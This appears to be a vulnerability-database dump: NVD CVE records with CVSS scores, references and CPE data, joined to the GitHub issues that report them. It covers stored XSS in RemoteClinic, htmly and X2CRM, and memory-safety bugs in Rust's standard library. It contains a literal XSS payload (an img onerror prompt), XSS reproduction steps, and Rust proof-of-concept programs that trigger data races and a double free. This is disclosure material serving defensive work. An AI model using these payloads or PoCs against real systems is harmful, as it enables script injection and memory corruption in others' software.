Stored XSS vulnerability in Version 2.0 which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: All Endpoints are vulnerable to XSS. Step to Reproduce: 1) Login in Application as Doctor. 2) Create New Staff Member. ![1](https://user-images.githubusercontent.com/81484562/113328864-45976980-9336-11eb-88c0-86e87633dc47.JPG) 3) Put XSS Payload on "First Name" and "Last Name" of Staff. Both Fields are vulnerable XSS (Site-Wide). ![Capture1](https://user-images.githubusercontent.com/81484562/113329107-9a3ae480-9336-11eb-8955-5209ad3d15a2.JPG) ![2](https://user-images.githubusercontent.com/81484562/113329508-19301d00-9337-11eb-8b2f-69e0dc2172ac.JPG) 4) Now Click on Register. ![3](https://user-images.githubusercontent.com/81484562/113331050-e555f700-9338-11eb-8fa1-8e27bd31dc10.JPG) 5) Profile Created. ![4](https://user-images.githubusercontent.com/81484562/113329594-3107a100-9337-11eb-991b-3f536b56109d.JPG) 6) Now SignOut. ![5](https://user-images.githubusercontent.com/81484562/113329647-41b81700-9337-11eb-8e63-139922a82a6e.JPG) 7) Now Login to that Staff account which i created in the name of XSS Payload. ![6](https://user-images.githubusercontent.com/81484562/113329801-775d0000-9337-11eb-86f8-80e154fa1f22.JPG) 8) XSS Executed on /dashboard/ endpoint because staff member name including "First Name" and "Last Name" Both are reflected on all the pages/endpoints. ![7](https://user-images.githubusercontent.com/81484562/113330017-bb500500-9337-11eb-9cb2-5bd83cefef18.JPG) --> Go to /patients/ endpoint. ![8](https://user-images.githubusercontent.com/81484562/113330115-d4f14c80-9337-11eb-996f-ae32c726ad29.JPG) --> Go to /register-patient.php endpoint. ![9](https://user-images.githubusercontent.com/81484562/113330298-ffdba080-9337-11eb-9e47-d4cf192cac60.JPG) --> Go to /recent-activity.php endpoint. ![10](https://user-images.githubusercontent.com/81484562/113330472-331e2f80-9338-11eb-8cfd-03da40bcf3d0.JPG) I tested all endpoints of RemoteClinic v2.0, all are vulnerable to XSS because of "First Name" and "Last Name" of Staff reflected all the pages and some of the endpoints i mentioned in the form of screenshots above.
Stored XSS vulnerability Site-Wide
https://api.github.com/repos/remoteclinic/RemoteClinic/issues/13/comments
1
2021-04-01T17:27:54Z
2021-04-21T20:29:22Z
https://github.com/remoteclinic/RemoteClinic/issues/13
848,653,955
13
1,826
CVE-2021-30637
2021-04-13T05:15:13.993
htmly 2.8.0 allows stored XSS via the blog title, Tagline, or Description to config.html.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162195/htmly-2.8.0-Cross-Site-Scripting.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/danpros/htmly/issues/456" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162195/htmly-2.8.0-Cross-Site-Scripting.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/danpros/htmly/issues/456" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:htmly:htmly:2.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "D6ECEDB6-2CA0-49EF-9701-A0E661C36C67", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/danpros/htmly/issues/456
[ "Exploit", "Third Party Advisory" ]
github.com
[ "danpros", "htmly" ]
The XSS filtering of blog title, Tagline, and Description in config.html.php is not rigorous, resulting in the generation of stored XSS ![image](https://user-images.githubusercontent.com/38587657/114492298-e9441c00-9c4a-11eb-8eaa-7727cba993ac.png) ![image](https://user-images.githubusercontent.com/38587657/114492317-f4974780-9c4a-11eb-8e7e-23c025717ccc.png) Front display ![image](https://user-images.githubusercontent.com/38587657/114492332-fcef8280-9c4a-11eb-90a0-a48de367d1a8.png)
The code has stored XSS vulnerabilities
https://api.github.com/repos/danpros/htmly/issues/456/comments
3
2021-04-13T03:26:18Z
2021-04-16T07:28:27Z
https://github.com/danpros/htmly/issues/456
856,531,063
456
1,827
CVE-2017-20004
2021-04-14T07:15:11.493
In the standard library in Rust before 1.19.0, there is a synchronization problem in the MutexGuard object. MutexGuards can be used across threads with any types, allowing for memory safety issues through race conditions.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/issues/41622" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/41624" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/issues/41622" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/41624" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rust-lang:rust:*:*:*:*:*:*:*:*", "matchCriteriaId": "F38A7CFC-D141-4D80-A5B2-2CD43BC89E0B", "versionEndExcluding": "1.19.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "362" ]
362
https://github.com/rust-lang/rust/issues/41622
[ "Patch", "Third Party Advisory" ]
github.com
[ "rust-lang", "rust" ]
Right now, `MutexGuard<Cell<i32>>` satisfies the `Sync` bound. That is rather bad, because it lets me write a program that has a data race: ```rust use std::sync::Mutex; use std::cell::Cell; extern crate rayon; fn main() { let m = Mutex::new(Cell::new(0)); let g = m.lock().unwrap(); { rayon::join( || { g.set(g.get() + 1); println!("Thread 1: {:?}", g.get()) }, || { g.set(g.get() + 1); println!("Thread 2: {:?}", g.get()) }); } } ``` The `get` and `set` calls in the two threads are unsynchronized (as usual for a `Cell`), and they are racing. This is a soundness bug. The cause for this is that `MutexGuard<T>` implements `Sync` whenever `T` implements `Send`, which is plain wrong. The fix is to let `MutexGuard<T>` implement `Sync` whenever `T` implements `Sync`. I will submit a PR soon.
MutexGuard<Cell<i32>> must not be Sync
https://api.github.com/repos/rust-lang/rust/issues/41622/comments
2
2017-04-29T07:11:01Z
2017-05-03T03:24:43Z
https://github.com/rust-lang/rust/issues/41622
225,239,298
41,622
1,828
CVE-2018-25008
2021-04-14T07:15:11.570
In the standard library in Rust before 1.29.0, there is weak synchronization in the Arc::get_mut method. This synchronization issue can be lead to memory safety issues through race conditions.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/issues/51780" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/52031" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/issues/51780" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/52031" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rust-lang:rust:*:*:*:*:*:*:*:*", "matchCriteriaId": "B5FEC2C7-F999-4492-AB5D-E34DA9417595", "versionEndExcluding": "1.29.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "662" ]
662
https://github.com/rust-lang/rust/issues/51780
[ "Third Party Advisory" ]
github.com
[ "rust-lang", "rust" ]
Consider the following Rust code: ```rust extern crate rayon; use std::sync::{Arc, Mutex}; use std::mem; use rayon::join; fn main() { let a1 = Arc::new(Mutex::new(0)); let mut a2 = &mut a1.clone(); join( || { { let mut guard = a1.lock().unwrap(); *guard += 1; mem::forget(guard); } drop(a1); }, || { loop { match Arc::get_mut(&mut a2) { None => (), Some(m) => { *m.get_mut().unwrap() += 1; return; } } } } ); } ``` The first thread acquires the lock, modifies the variable, and then drop its Arc *without unlocking* (that's the point of the `mem::forget`). The second thread waits until the first thread decrements the count by dropping its Arc, and then uses `get_mut` to access the content *without taking the lock* (at that time, the mutex is still locked). My claim is that there is a race between the two accesses of the content of the mutex. The only reason the two accesses would be in a happens-before relationship would be that `Arc::drop` and `Arc::get_mut` would establish this happens-before relationship. However, even though `Arc::drop` does use a release write, `Arc::get_mut` only uses a relaxed read of the strong counter (via `is_unique`). The fix is to use an acquire read in `is_unique`. I do not expect significant performance penalty here, since `is_unique` already contains several release-acquire accesses (of the weak count). CC @RalfJung **EDIT** As @RalfJung noted, we do not actually need leaking memory to exploit this bug (hence this is not another instance of Leakpocalypse). The following piece of code exhibit the same problem: ```rust extern crate rayon; use std::sync::Arc; use rayon::join; fn main() { let a1 = Arc::new(0); let mut a2 = a1.clone(); join( || { let _ : u32 = *a1; drop(a1); }, || { loop { match Arc::get_mut(&mut a2) { None => {} Some(m) => { *m = 1u32; return; } } } } ); } ```
Insufficient synchronization in `Arc::get_mut`
https://api.github.com/repos/rust-lang/rust/issues/51780/comments
8
2018-06-25T15:44:34Z
2018-07-06T08:59:42Z
https://github.com/rust-lang/rust/issues/51780
335,463,751
51,780
1,829
CVE-2020-36323
2021-04-14T07:15:12.087
In the standard library in Rust before 1.52.0, there is an optimization for joining strings that can cause uninitialized bytes to be exposed (or the program to crash) if the borrowed string changes after its length is checked.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 4.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/issues/80335" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/81728" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/81728#issuecomment-821549174" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/81728#issuecomment-824904190" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CZ337CM4GFJLRDFVQCGC7J25V65JXOG5/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TFUO3URYCO73D2Q4WYJBWAMJWGGVXQO4/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VZG65GUW6Z2CYOQHF7T3TB5CZKIX6ZJE/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/issues/80335" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/81728" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/81728#issuecomment-821549174" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/81728#issuecomment-824904190" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CZ337CM4GFJLRDFVQCGC7J25V65JXOG5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TFUO3URYCO73D2Q4WYJBWAMJWGGVXQO4/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VZG65GUW6Z2CYOQHF7T3TB5CZKIX6ZJE/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rust-lang:rust:*:*:*:*:*:*:*:*", "matchCriteriaId": "8E9A2A10-536D-4719-9D35-637A525E1E04", "versionEndExcluding": "1.52.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "134" ]
134
https://github.com/rust-lang/rust/issues/80335
[ "Patch", "Third Party Advisory" ]
github.com
[ "rust-lang", "rust" ]
A weird `Borrow` implementation that returns a different result for each call can create a string with uninitialized bytes with [join()](https://doc.rust-lang.org/std/primitive.slice.html#impl-Join%3C%26%27_%20str%3E) implementation of `[Borrow<str>]` type. The problem is in [`join_generic_copy`](https://github.com/rust-lang/rust/blob/3ffea60dd5a2260004cc4f487401ae7c7db1aa0e/library/alloc/src/str.rs#L137) function. 1. The borrow result is first used for the length calculation. https://github.com/rust-lang/rust/blob/3ffea60dd5a2260004cc4f487401ae7c7db1aa0e/library/alloc/src/str.rs#L152-L161 2. Then, inside `spezialize_for_lengths` macro, the user-provided slice is borrowed again and the content is copied. https://github.com/rust-lang/rust/blob/3ffea60dd5a2260004cc4f487401ae7c7db1aa0e/library/alloc/src/str.rs#L110-L114 3. Finally, the length of the slice is set to the length calculated in step 1. https://github.com/rust-lang/rust/blob/3ffea60dd5a2260004cc4f487401ae7c7db1aa0e/library/alloc/src/str.rs#L179 [Playground link](https://play.rust-lang.org/?version=stable&mode=debug&edition=2018&gist=7432c762775696504c2fb19439fc091a), which demonstrates creating a non-UTF-8 string by only using safe Rust.
API soundness issue in join() implementation of [Borrow<str>]
https://api.github.com/repos/rust-lang/rust/issues/80335/comments
2
2020-12-23T16:44:23Z
2021-03-28T08:53:50Z
https://github.com/rust-lang/rust/issues/80335
773,925,837
80,335
1,830
CVE-2021-31162
2021-04-14T07:15:12.227
In the standard library in Rust before 1.52.0, a double free can occur in the Vec::from_iter function if freeing the element panics.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/issues/83618" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/83629" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/84603" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CZ337CM4GFJLRDFVQCGC7J25V65JXOG5/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TFUO3URYCO73D2Q4WYJBWAMJWGGVXQO4/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VZG65GUW6Z2CYOQHF7T3TB5CZKIX6ZJE/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-09" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/issues/83618" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/83629" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/84603" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CZ337CM4GFJLRDFVQCGC7J25V65JXOG5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TFUO3URYCO73D2Q4WYJBWAMJWGGVXQO4/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VZG65GUW6Z2CYOQHF7T3TB5CZKIX6ZJE/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-09" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rust-lang:rust:*:*:*:*:*:*:*:*", "matchCriteriaId": "3522EF72-A890-4F56-A49D-723B4B153E10", "versionEndExcluding": "1.52.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.48.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "415" ]
415
https://github.com/rust-lang/rust/issues/83618
[ "Exploit", "Third Party Advisory" ]
github.com
[ "rust-lang", "rust" ]
https://github.com/rust-lang/rust/blob/4a20eb6a9da36c88ee929826c4f1eb8d7ea393b2/library/alloc/src/vec/source_iter_marker.rs#L71-L72 https://github.com/rust-lang/rust/blob/4a20eb6a9da36c88ee929826c4f1eb8d7ea393b2/library/alloc/src/vec/into_iter.rs#L88-L93 `SpecFromIter<T, I> for Vec<T>` calls `Vec::IntoIter::drop_remaining()`. `drop_remaining()` calls `drop_in_place()` before overwriting the pointer. As a result, dropped elements are not invalidated and dropped again under panic. PoC: ```rust #![forbid(unsafe_code)] use std::iter::FromIterator; #[derive(Debug)] enum MyEnum { DroppedTwice(Box<i32>), PanicOnDrop, } impl Drop for MyEnum { fn drop(&mut self) { match self { MyEnum::DroppedTwice(_) => println!("Dropping!"), MyEnum::PanicOnDrop => { if !std::thread::panicking() { panic!(); } } } } } fn main() { let v = vec![MyEnum::DroppedTwice(Box::new(123)), MyEnum::PanicOnDrop]; Vec::from_iter(v.into_iter().take(0)); } ``` Output: ``` Dropping! thread 'main' panicked at 'explicit panic', src/main.rs:17:21 note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace Dropping! free(): double free detected in tcache 2 ``` Tested with `rustc 1.51.0`. Here is a [playground link](https://play.rust-lang.org/?version=stable&mode=debug&edition=2018&gist=9ee0a0b525970bc4ea2dc87e35aeda3a) to the code snippet. <!-- TRIAGEBOT_START --> <!-- TRIAGEBOT_ASSIGN_START --> <!-- TRIAGEBOT_ASSIGN_DATA_START$${"user":"the8472"}$$TRIAGEBOT_ASSIGN_DATA_END --> <!-- TRIAGEBOT_ASSIGN_END --> <!-- TRIAGEBOT_END -->
Double free in Vec::from_iter specialization when drop panics
https://api.github.com/repos/rust-lang/rust/issues/83618/comments
2
2021-03-28T20:48:16Z
2021-04-02T22:47:14Z
https://github.com/rust-lang/rust/issues/83618
842,827,795
83,618
1,831
CVE-2020-21087
2021-04-14T14:15:13.147
Cross Site Scripting (XSS) in X2Engine X2CRM v6.9 and older allows remote attackers to execute arbitrary code by injecting arbitrary web script or HTML via the "New Name" field of the "Rename a Module" tool.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/X2Engine/X2CRM/issues/162" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/X2Engine/X2CRM/issues/162" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:x2engine:x2crm:*:*:*:*:*:*:*:*", "matchCriteriaId": "83D6B813-5205-4EE3-BB5D-C6BB62F18A8C", "versionEndExcluding": null, "versionEndIncluding": "6.9", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/X2Engine/X2CRM/issues/162
[ "Exploit", "Third Party Advisory" ]
github.com
[ "X2Engine", "X2CRM" ]
Hi agian Description : XSS in module name will prompt in all other pages of X2CRM CE V6.9 Sample Pic: ![ezgif-4-97e4273b25ba](https://user-images.githubusercontent.com/21213484/48061148-39de0200-e1d3-11e8-88c1-a7a952e02971.gif) Payload to use : "><img src=x onerror=prompt('@darknetguy');> Tested on Windows 10 Firefox | Google Chrome // Cent-OS 7 Firefox | Chromium BR, Milad Fadavvi
Stored XSS in module name
https://api.github.com/repos/X2Engine/X2CRM/issues/162/comments
1
2018-11-06T11:20:22Z
2023-03-28T17:16:44Z
https://github.com/X2Engine/X2CRM/issues/162
377,802,204
162
1,832
CVE-2020-21088
2021-04-14T14:15:13.210
Cross Site Scripting (XSS) in X2engine X2CRM v7.1 and older allows remote attackers to obtain sensitive information by injecting arbitrary web script or HTML via the "First Name" and "Last Name" fields in "/index.php/contacts/create page"
